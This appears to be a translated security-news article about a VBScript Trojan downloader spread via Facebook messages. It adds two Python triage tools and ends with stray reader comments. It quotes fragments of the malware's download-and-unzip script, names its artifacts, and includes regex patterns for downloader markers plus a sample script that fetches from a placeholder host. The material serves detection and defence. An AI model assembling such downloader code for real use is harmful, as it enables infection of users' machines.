A message from a friend alerted us to a new threat (a Trojan) circulating on Facebook. Using the social network's messaging service, scammers try to push Trojans onto unsuspecting users.
Our friend from safer-internet.gr sent us two different screenshots of Facebook messages. The messages say something like "see this and don't tell anyone" and carry two .rar files with different names:
We asked for the files so we could analyze them and, of course, they contained nothing worth looking at. Although the two .rar archives had different names, the executable file inside each was exactly the same (same CRC checksum),
and its name: Watch This !!! vbs
The executables were .vbs files. VBScript is a scripting language that ships with Windows. You can do various useful things with it, as you have seen in the Tweaks category of iGuRu.gr, but you can also write Trojans with it.
The script contained in the two .rar archives carried the TrojanDownloader.Agent.NJV Trojan, which ESET indexed on 11 February 2012.
What does a Trojan downloader do?
A Trojan downloader, once running on the victim's computer, contacts a remote computer to download files, which it then installs on the infected machine.
This particular Trojan, TrojanDownloader.Agent.NJV, is old, so it is recognized immediately by antivirus software, provided, of course, that you have kept it updated.
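A downloader of this kind is usually easy to spot statically before it ever runs: the script has to create an HTTP client, write the response to disk, and launch something. The following Python triage helper is an added example (not iGuRu.gr's code and not the actual "Watch This !!!" script): it fingerprints a sample with CRC32 and SHA-256, the way the two archives above were compared, and scans VBScript text for downloader markers and embedded indicators. The COM object names it looks for (MSXML2.XMLHTTP, ADODB.Stream, WScript.Shell, Shell.Application) are assumed typical markers, and the sample script at the bottom is constructed for the demo with a non-routable URL.

```python
"""Static triage of a VBScript sample: fingerprint it, flag downloader-style
indicators and pull out network/file IoCs.  Added example, not the article's
code.  SAMPLE_VBS below is constructed for the demo and does nothing."""
import hashlib
import re
import zlib

# Markers that commonly appear in VBScript downloaders (assumed typical, not
# taken from the article).  A hit is a triage hint, not proof of malice.
DOWNLOADER_MARKERS = {
    "http_client": re.compile(
        r'CreateObject\("(MSXML2\.XMLHTTP[^"]*|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest[^"]*)"\)', re.I),
    "binary_write": re.compile(r'CreateObject\("ADODB\.Stream"\)', re.I),
    "shell_exec": re.compile(r'CreateObject\("(WScript\.Shell|Shell\.Application)"\)', re.I),
    "java_payload": re.compile(r"\.jar\b", re.I),
}
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)
ARCHIVE_RE = re.compile(r"[\w.\-]+\.(?:zip|rar|jar|exe)\b", re.I)
FOLDER_RE = re.compile(r'"(\\[A-Za-z0-9_]+)"')  # quoted "\Folder" literals


def fingerprint(data: bytes) -> dict:
    """CRC32 (what the article's comparison used) plus SHA-256 for a stronger identity."""
    return {
        "crc32": f"{zlib.crc32(data) & 0xFFFFFFFF:08x}",
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def same_sample(a: bytes, b: bytes) -> bool:
    """True when two files (e.g. from two differently named archives) are byte-identical."""
    return fingerprint(a) == fingerprint(b)


def triage_vbs(source: str) -> dict:
    """Return marker hits plus the URLs, archive/jar names and folder literals found."""
    hits = [name for name, rx in DOWNLOADER_MARKERS.items() if rx.search(source)]
    return {
        "markers": hits,
        "urls": sorted(set(URL_RE.findall(source))),
        "artifacts": sorted({m.lower() for m in ARCHIVE_RE.findall(source)}),
        "folders": sorted(set(FOLDER_RE.findall(source))),
        # download capability combined with a way to persist or execute the result
        "suspicious": "http_client" in hits and ("binary_write" in hits or "shell_exec" in hits),
    }


# Constructed sample: only the object creations and string literals a scanner
# would key on; the download/unzip logic itself is deliberately left out.
SAMPLE_VBS = r'''
Set http = CreateObject("MSXML2.XMLHTTP")
Set stream = CreateObject("ADODB.Stream")
Set sh = CreateObject("WScript.Shell")
csPATH = sh.ExpandEnvironmentStrings("%TEMP%") & "\MyFolderakis"
http.Open "GET", "http://example.invalid/vasika/content.zip", False
' ... write the response to csPATH & "\content.zip", unzip it, then wait for sapsalo.jar
'''

if __name__ == "__main__":
    print(fingerprint(SAMPLE_VBS.encode()))
    print(triage_vbs(SAMPLE_VBS))
```

Run against a real sample, the "urls" and "artifacts" lists are the IoCs to block or hunt for, and `same_sample` answers the "are the two archives really the same payload?" question without opening either of them.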
Needless to say, do not open zip or rar files that you were not expecting, even if you know who sent them.
If you have already run the file and your antivirus did not flag it, change or update your security application.
Update:
While malicious messages are still arriving on Facebook, we decided to open the script for further analysis.
All malicious links seem to lead to the same server, which has apparently been compromised.
Three of the domains are shown in the image below:
The iGuRu.gr team has informed the server owner of the steps that need to be taken.
All malicious addresses are included in the photo below, as they appear in the script.
We believe the malicious user is Greek, since there are malicious files with Greek names, such as /vasika/kalisperasas.zip. Also, the folder it creates for the downloaded malicious files has been named "\MyFolderakis" by the malicious user.
After installation, the script creates the above folder on the victim's computer and downloads content.zip, which contains a single .jar file.
download (csPATH)
Unzip csPATH & "\content.zip", csPATH
Loop While ReportFileStatus (csPATH & "\sapsalo.jar
Once it downloads content.zip and runs the .jar (while the .vbs script only runs on Windows, the .jar runs on Windows, Mac and Linux), it starts downloading all the other malicious files from the links shown above.
Beware: we did not download the above files, and we do not know what they are.
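The artifacts described above (a working folder named MyFolderakis, a content.zip inside it, and the sapsalo.jar it unpacks) are exactly what an incident responder would look for on a machine that received one of these messages. The following Python checker is an added example, not iGuRu.gr's code: it walks a directory tree for those names, lists any .jar members of zip files it encounters, and builds a throwaway demo tree (with harmless placeholder bytes, constructed here) so it can be run offline. The folder and file names come from the article; the demo paths under it are made up.

```python
"""Host triage for the on-disk artifacts left by the downloader described in
the article.  Added example, not the article's code.  The demo tree is
constructed with placeholder bytes; no real sample is involved."""
import os
import tempfile
import zipfile
from pathlib import Path

FOLDER_IOC = "myfolderakis"                 # folder name taken from the article
FILE_IOCS = {"content.zip", "sapsalo.jar"}  # file names taken from the article


def jar_members(zip_path: str) -> list:
    """Names of .jar entries inside a zip, or [] if the file is not a valid zip."""
    try:
        with zipfile.ZipFile(zip_path) as zf:
            return [n for n in zf.namelist() if n.lower().endswith(".jar")]
    except zipfile.BadZipFile:
        return []


def scan_for_artifacts(root: str) -> list:
    """Walk `root` and return one finding per matching folder, file or zip-with-jar."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath).lower() == FOLDER_IOC:
            findings.append({"type": "folder", "path": dirpath})
        for name in filenames:
            full = os.path.join(dirpath, name)
            lower = name.lower()
            if lower in FILE_IOCS:
                findings.append({"type": "file", "path": full})
            if lower.endswith(".zip"):
                jars = jar_members(full)
                if jars:  # a zip carrying a jar matches the content.zip pattern
                    findings.append({"type": "zip_with_jar", "path": full, "members": jars})
    return findings


def summarize(findings: list) -> dict:
    """Count findings by type, e.g. {'folder': 1, 'file': 2, 'zip_with_jar': 1}."""
    counts = {}
    for f in findings:
        counts[f["type"]] = counts.get(f["type"], 0) + 1
    return counts


def build_demo_tree(infected: bool = True) -> str:
    """Create a temporary tree; with infected=True it mimics the article's artifacts."""
    root = tempfile.mkdtemp(prefix="triage_demo_")
    user_dir = Path(root) / "Users" / "victim"
    user_dir.mkdir(parents=True)
    (user_dir / "notes.txt").write_text("benign file")
    if infected:
        folder = user_dir / "MyFolderakis"
        folder.mkdir()
        with zipfile.ZipFile(folder / "content.zip", "w") as zf:
            zf.writestr("sapsalo.jar", b"placeholder, not a real jar")
        (folder / "sapsalo.jar").write_bytes(b"placeholder, not a real jar")
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for finding in scan_for_artifacts(demo):
        print(finding)
    print(summarize(scan_for_artifacts(demo)))
```

Point `scan_for_artifacts` at a user profile or a whole drive to check a machine; because the folder name match is case-insensitive and the zip check looks at members rather than names, a renamed copy of content.zip still shows up as `zip_with_jar`.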
iGuru_gr: @patrik31 thanks for the prompt reply
patrik31: not because vbs only runs on Windows
dimitrios1988: @marikijohn3 ok, thanks a lot anyway ;)